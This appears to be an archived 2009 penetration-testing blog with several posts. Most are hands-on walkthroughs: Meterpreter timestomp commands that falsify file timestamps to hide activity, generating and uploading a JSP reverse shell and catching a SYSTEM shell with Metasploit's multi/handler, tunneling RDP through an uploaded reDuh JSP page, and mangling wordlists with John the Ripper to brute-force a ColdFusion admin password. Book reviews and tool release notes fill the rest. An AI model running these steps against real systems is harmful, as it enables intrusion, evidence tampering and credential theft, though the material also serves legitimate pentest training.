carnal0wnage [Shared Reader]

Thursday, October 29, 2009

More On Metasploit Meterpreter & Timestomp

Well, probably "more" I honestly didn't look.

So there is blurb on the metasploit unleashed course on using timestomp. Unfortunately it leads you to believe that blanking the MACE values on a file or whole directory is better than hiding in plain sight. I suppose this can be debated (so feel free).

But... timestomp has a few other options worth discussing, notably setting MACE times from a file or individually setting attributes or setting all four attributes at once to a MACE time of your choosing.

meterpreter > timestomp

Usage: timestomp file_path OPTIONS


OPTIONS:

-a Set the "last accessed" time of the file

-b Set the MACE timestamps so that EnCase shows blanks

-c Set the "creation" time of the file
-e Set the "mft entry modified" time of the file
-f
Set the MACE of attributes equal to the supplied file
-h Help banner

-m
Set the "last written" time of the file
-r Set the MACE timestamps recursively on a directory

-v Display the UTC MACE values of the file

-z
Set all four attributes (MACE) of the file

Check our current values

meterpreter > timestomp C:\\boot.ini -v
Modified : Wed Aug 12 18:12:39 -0400 2009
Accessed : Thu Oct 29 16:13:12 -0400 2009
Created : Wed Aug 12 11:06:54 -0400 2009
Entry Modified: Wed Aug 12 18:23:34 -0400 2009

Set the Modified time to 11/11/2011 at 11:11:11

meterpreter > timestomp C:\\boot.ini -m "11/11/2011 11:11:11"
[*] Setting specific MACE attributes on C:\boot.ini


Did it work?

meterpreter > timestomp C:\\boot.ini -v
Modified : Fri Nov 11 11:11:11 -0500 2011
Accessed : Thu Oct 29 16:13:12 -0400 2009
Created : Wed Aug 12 11:06:54 -0400 2009

Entry Modified: Wed Aug 12 18:23:34 -0400 2009

Set them all to 11/11/2011 at 11:11:11

meterpreter > timestomp C:\\boot.ini -z "11/11/2011 11:11:11"

[*] Setting specific MACE attributes on C:\boot.ini


Did it work?

meterpreter > timestomp C:\\boot.ini -v

Modified : Fri Nov 11 11:11:11 -0500 2011
Accessed : Fri Nov 11 11:11:11 -0500 2011

Created : Fri Nov 11 11:11:11 -0500 2011

Entry Modified: Fri Nov 11 11:11:11 -0500 2011


From a file

meterpreter > timestomp C:\\update.exe -v
Modified : Fri Apr 30 05:59:36 -0400 2004
Accessed : Fri Oct 23 20:28:36 -0400 2009
Created : Thu Apr 29 22:33:55 -0400 2004
Entry Modified: Fri Apr 30 06:22:35 -0400 2004

meterpreter > timestomp C:\\update.exe -f C:\\boot.ini
[*] Setting MACE attributes on C:\update.exe from C:\boot.ini

meterpreter > timestomp C:\\update.exe -v
Modified : Fri Apr 30 05:59:36 -0400 2004
Accessed : Sat Oct 24 05:34:03 -0400 2009
Created : Thu Apr 29 22:33:55 -0400 2004
Entry Modified: Fri Apr 30 06:22:35 -0400 2004

meterpreter > timestomp C:\\boot.ini -v
Modified : Fri Apr 30 05:59:36 -0400 2004
Accessed : Sat Oct 24 05:34:03 -0400 2009
Created : Thu Apr 29 22:33:55 -0400 2004
Entry Modified: Fri Apr 30 06:22:35 -0400 2004



Happy Hiding in plain sight.

-CG

Saturday, October 24, 2009

DirSnatch_v2.0 is released

Hey guys, well my brother @k3r0s1n3 and I decided to give an upgrade to DirSnatch before moving on to QwickR which is sort of like part 1 or 2.

Feel free to download the app at the DirSnatch Project Page

Anyway, here are some pics of the new version



Choosing directory to list









Choosing either http:// or https:// to prepend






Location to save the list to





This is what it will look like when all options are chosen




Beyond the obvious visual changes we've included error handling in this version. Okay folks, next up, QwickR!!

Happy Hacking!

Thursday, October 22, 2009

DirSnatch has gone GUI

Hey all, as promised I have something coded up and it works well enough to release. Still a lot of functionality to add so you can give your customers something nice to look at it and fairly dummy proof.

DirSnatch, the script I wrote with @k3r0s1n3 was really something my customers liked (due to expedited testing times) but was basically really ugly. It was ugly because it was a dreaded console app :(

Okay, so using the ruby gems 'ocra' and 'wxruby' k3r0s1n3 and I were able to create a windows based stand-alone executable in GUI form.

Again, there is a TON to add to this tool and make it just cooler to work with.

Also, we are working on making Qwickr (formerly qwick_request) GUI.

Qwickr currently allows you to request URLs in a text file (such as the output from DirSnatch) in a threaded fashion thru the intercepting proxy of your choice. This is also helpful if you intercepting proxy doesn't allow you to save the URLs you've spidered. This creates a site map in no time.

The console version of Qwickr is finished but we don't want to release until its functioning as a GUI app. So be on the look out for that.

Here is a screen shot of DirSnatch_v1.1



This is what the output.txt looks like



So the new version can be download Here

The file annotated GUI_DirSnatch.rb works on linux but you must perform a 'gem install wxruby'

Happy Hacking!

Metasploit JSP Shells

Stephen Fewer has pushed up a jsp reverse and jsp bind shell.

http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/java

I'm not sure of all the ways to use them but the easiest way is to just output the shell to raw and just upload it to a web server or for an example with an exploit check out the adobe robohelp exploit.

http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rb


yomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > blah.jsp

From there you can set up your multi handler, browse to your page webpath/blah.jsp and grab your shell.

yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole
=[ msf v3.3-dev [core:3.3 api:1.0]

+ -- --=[ 432 exploits - 261 payloads

+ -- --=[ 21 encoders - 8 nops

=[ 222 aux



msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp

set PAYLOAD java/jsp_shell_reverse_tcp

msf exploit(handler) > set LHOST 192.168.10.1

LHOST => 192.168.10.1

msf exploit(handler) > info


Name: Generic Payload Handler

Version: 6558

Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP

Privileged: No

License: Metasploit Framework License (BSD)


Provided by:
hdm

Available targets:

Id Name

-- ----

0 Wildcard Target


Payload information:

Space: 100000

Avoid: 0 characters



Description:

This module is a stub that provides all of the features of the

Metasploit payload system to exploits that have been launched

outside of the framework.


msf exploit(handler) > show options


Module options:


Name Current Setting Required Description

---- --------------- -------- -----------



Payload options (java/jsp_shell_reverse_tcp):


Name Current Setting Required Description

---- --------------- -------- -----------
LHOST 192.168.10.1 yes The local address
LPORT 4444 yes The local port
SHELL cmd.exe yes The system shell to use.


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > exploit

[*] Starting the payload handler...

[*] Started reverse handler

[*] Command shell session 1 opened ( 192.168.10.1:4444 -> 192.168.10.2:42957)

Microsoft Windows [Version 5.2.3790]

(C) Copyright 1985-2003 Microsoft Corp.


C:\ColdFusion8\runtime\bin>
whoami
whoami

nt authority\system


C:\ColdFusion8\runtime\bin>
exit
exit


[*] Command shell session 1 closed.

Attacking Oracle with Metasploit Blackhat USA 2009

Here's my Attacking Oracle with Metasploit Blackhat USA 2009 talk

Attacking Oracle with the Metasploit Framework BH USA 2009 from carnal0wnage on Vimeo.

Tuesday, October 20, 2009

SQL Injection Attacks and Defense Book Review

SQL Injection Attacks and Defense Book Review

Justin Clarke (and others)

5 stars

Most Up To Date and Digestible Book on SQL Injection

First off, kudos to Syngress for putting out a high quality book. It looks like they are turning things around.

Second, kudos to the authors for finally explaining SQL Injection and exploiting the OS through the database in a understandable way. Previous books have tried and failed but this book succeeds in explaining what SQL Injection is, how the three forms (Error Based, Union Based, & Blind) of SQL Injection work, as well as post exploitation activities on various databases.

Here's what you get:

Chapter 1: What is SQL Injection?
Chapter 2: Testing for SQL Injection
Chapter 3: Reviewing Code for SQL Injection
Chapter 4: Exploiting SQL Injection
Chapter 5: Blind SQL Injection Exploitation
Chapter 6: Exploiting the Operating System
Chapter 7: Advanced Topics
Chapter 8: Code-Level Defenses
Chapter 9: Platform-Level Defenses
Chapter 10: References

Favorite chapters include "Review Code for SQL Injection", "Exploiting SQL Injection", and "Exploiting the Operating System".

In general I have nothing but positive things to say about the book. However I do wish there was more "new" material for Oracle as most of the discussion on Oracle can be found on the author's blog and presentations. Unfortunately the majority of the things I was unclear about before reading the book, I'm still unclear about because its the same material. My biggest gripe comes from the Oracle privilege escalation section of Chapter 4 where its says "Privilege escalation via Web Application SQL injection is Oracle is quite difficult because most approaches for privilege escalation attacks require PL/SQL injection, which is less common." But never gives an example of how to do PL/SQL injection via the web application. Uncommon != never. Unfortunately for most penetration testers access the TNS listener is usually firewalled off and exploitation Oracle through the web application is exactly whats required. Not covering that vector is really a downer. I'm not an expert in any of the databases so maybe the problem applies to other databases in the book but i didn't notice it in my reading.

There was also a lack of discussion on DB2 or Postgress but there is some material in the Cheat-Sheets section for those databases.

On a more positive note, the coverage of the three core databases (MSSQL, MySQL, ORACLE) is excellent (with the exception of the above comments) and there are two really good chapters on defense (CH8 Code-Level Defenses & CH9 Platform-Level Defenses). Its a must have if you are getting into web application testing.

Annaliza Savage - Unauthorized Access (documentary)

Someone posted a link to this on Twitter, its a good old school documentary and worth the watch.


Sunday, October 18, 2009

Oracle Hacker's Handbook Book Review

The Oracle Hacker's Handbook Book Review

by David Litchfield

4 Stars

Required Reading for Breaking into Oracle Databases

I've been doing some Oracle research and of course this is the only book on the market that really covers breaking into Oracle with the exception of The Database Hacker's Handbook which came out in 2005. Justin Clark's (and others) SQL Injection Book published in 2009 also covers some Oracle material but not enough to make this book obsolete.

I bought this book immediately when it came out in 2007 (yeah I'm super late on the review) but frankly put it down because it was confusing and definitely not suited for anyone that didn't already have a basic exposure to Oracle. I picked it up again in late 2008 after doing the background research on Oracle security and administration. Armed with a better understanding of Oracle in general I attacked the book again, focusing on SQL Injection in the Oracle PL/SQL packages with the goal of going from locating an open TNS listener to getting a shell on the system.

The author is well known in the security industry and one of only a handful of Oracle Security "experts", so the skill level was definitely there.

Breakdown of the Chapters:
Introduction.
Chapter 1 Overview of the Oracle RDBMS.
Chapter 2 The Oracle Network Architecture.
Chapter 3 Attacking the TNS Listener and Dispatchers.
Chapter 4 Attacking the Authentication Process.
Chapter 5 Oracle and PL/SQL.
Chapter 6 Triggers.
Chapter 7 Indirect Privilege Escalation.
Chapter 8 Defeating Virtual Private Databases.
Chapter 9 Attacking Oracle PL/SQL Web Applications.
Chapter 10 Running Operating System Commands.
Chapter 11 Accessing the File System.
Chapter 12 Accessing the Network.
Appendix A Default Usernames and Passwords.

I think most of the background chapters are "adequate" and the exploitation chapters are very good. At the time of publishing the author released code for vulnerabilities that were brand new. I do have issues with Chapter 5 Oracle and PL/SQL. I think the coverage of PL/SQL is only adequate if you already know PL/SQL. It took me going and reading a lot of other material on the net about PL/SQL to understand things that are glossed over in the chapter. The chapter is good and covers tons of material but from an attacking Oracle perspective more time should have been spent on teaching the reading how to use the "describe" package option in PL/SQL to describe the package to learn how to craft your queries correctly as well as how to research and write your own SQL Injection queries based on published vulnerabilities. More coverage on default privileges and roles would have been useful as well. Again, if you have been an Oracle DBA, you understand this already. If you are an Oracle security researchers you know this already. If you are a pentester trying to get some Oracle under your belt you'll have to go pick up another book or hit the internet to get the background material.

The other chapters are good and they cover their stated topics. More examples would have been nice of course. A couple of times we are told to check out the Oracle coverage in The Database Hacker's Handbook. That's just frustrating. While I'm not a huge fan of republishing materials, if information is needed to understand or better understand a topic then include it, its not like OHH was "running long" its very slim for a security book.

What knocked the book down to 4 stars was when I went and read the Oracle sections of The Database Hacker's Handbook and it had material that wasn't included in OHH. Given the "slimness" of the book, it wouldn't have hurt the book to reproduce the content from DHH as it is relevant and helps explain the concepts better than the coverage in OHH.


source code download location
http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470080221,descCd-DOWNLOAD.html


Thursday, October 15, 2009

More On Using Sensepost's reDuh

(mirrored from carnal0wnage.attackresearch.com)

A bit more on sensepost's reDuh

sensepost page on it: http://www.sensepost.com/research/reDuh/

reDuh comes with a reDuh.jsp, aspx, and php pages. work you magic to upload the page to the remote server. once its there you can connect to it with the reDuh Client

yomama@c0:~/pentest/webapp/reduh/reDuhClient$ sudo java -jar reDuhClient.jar http://172.16.82.144/CFIDE/reDuh.jsp
[Info]Querying remote web page for usable remote service port
[Info]Remote RPC port chosen as 42005
[Info]Attempting to start reDuh from 172.16.82.144:80/CFIDE/reDuh.jsp. Using service port 42005. Please wait...
[Info]reDuhClient service listener started on local port 1010

Once you are connected to the remote end, in another terminal connect to your local reDuh instance.

yomama@c0:~$ nc localhost 1010
Welcome to the reDuh command line
>>[usage]
Commands are of the form [command]{options}

Available commands:
[usage] - This menu
[createTunnel]::
[killReDuh] - terminates remote JSP process, and ends this client program
[DEBUG]<0|1|2> - Sets the verbosity

>>[createTunnel]4567:172.16.82.144:3389
Successfully bound locally to port 4567. Awaiting connections.

In your other shell you should see something similar to this:

[Info]Caught new service connection on local port 1010
[Info]Successfully bound locally to port 4567. Awaiting connections.

Fire up your terminal server client and point it at localhost:4567

[Info]Requesting reDuh to create socket to 172.16.82.144:3389
[Info]Successfully created socket 4567:172.16.82.144:3389:1
[Info]Localhost ====> 172.16.82.144:3389:1 (34 bytes read from local socket)
[Info]Caught data with sequenceNumber 0
[Info]Localhost <==== 172.16.82.144:3389:1 (11 bytes picked up from remote port) [Info]Localhost ====> 172.16.82.144:3389:1 (386 bytes read from local socket)
[Info]Caught data with sequenceNumber 1

If all is working you'll see a shitload of http traffic and eventually your RDP prompt.


Sunday, October 11, 2009

Creating wordlists with JTR

(mirrored from carnal0wnage.attackresearch.com)

Nothing new, probably covered else where but useful to revisit (maybe)...at least for my notes.

We had to try to bruteforce the ColdFusion admin password on a past pentest (more on that in another post--still testing the new MSF ColdfFusion modules). After trying my popular passwords (short) list I came nil so decided to use some words from the site we were trying to break into and use john to mangle the list up for some additional passwords to try.

you start with you initial list of words (you can also use CeWL http://www.digininja.org/projects/cewl.php to generate a site specific wordlist for you)

you then throw them into John and have the rules file mangle them.

yomoma@c0:~/pentest/john/run$ ./john --wordlist=/tmp/passwords-startwith.lst --rules --stdout | ./unique /tmp.passwords-mangled.lst

started with:

blah
carnal
0wnage
carnal0wnage
carnalownage

ended up with 159 words (it dropped the carnal0wnage after the upcase, not sure why) based on the default word mangling rules with john (that may or may not be that useful to you).

that's where JTR Config Maker from http://reusablesec.googlepages.com/jtrconfiggenerator can come in handy.

specifically " -Option (3) allows you to create word mangling rules. For example, add two numbers to the end of the dictionary word, and replace ‘a’ with an ‘@’."

so i F'ed with it for awhile and came up with a pretty good list i thought that was better than the default rules. You can pretty much set any type of mangle rule you want, save the rules file and even export out your john.conf to use so you can generate your password list like above.

If people are interested in more detail on this process let me know via comments.

Saturday, October 10, 2009

Update to October 9th BToD

Hey folks, @mubix informed me that he has made a change to the DB export of Nikto. If you would like to see the improved command for extraction of the Nikto db_tests for use with Intruder please visit his site at Room362 .

Friday, October 9, 2009

BToD Importing Nikto DB to Intruder > Courtesy of @mubix

Its Friday, oh how we love Friday. Anyways, courtesy of @mubix we have a command to export the Nikto DB into a format suitable for Intruder. If you have any questions about how to load into intruder reference the other posts. I take no credit for this, @mubix came up with this command.

So in BackTrack3 you can use the command

cat /pentest/web/nikto/plugins/db_tests | awk -F "," '{print $4}' | sed 's/^\"*//;s/\"$//' | sed 's/^\@CGIDIRS//;s/\@ADMIN//;s/^\@NUKE//;s/^\@POSTNUKE//;s/^\@PHPMYADMIN//' | sed 's/^\///' > ~/nikto_burp.txt

or in BackTrack4

cat /var/lib/nikto/plugins/db_tests | awk -F "," '{print $4}' | sed 's/^\"*//;s/\"$//' | sed 's/^\@CGIDIRS//;s/\@ADMIN//;s/^\@NUKE//;s/^\@POSTNUKE//;s/^\@PHPMYADMIN//' | sed 's/^\///' > ~/nikto_burp.txt

Like so.........


and this will export the contents of the nikto db_tests into a txt file and in the format Intruder prefers.

Should look like.......



There you have it. Make sure you show @mubix some love by visiting his site Room362 and remember that PortSwigger just released Burp Suite Pro v2.17 which has an xml export for the scanner findings suitable for Dradis import.

Happy Hacking!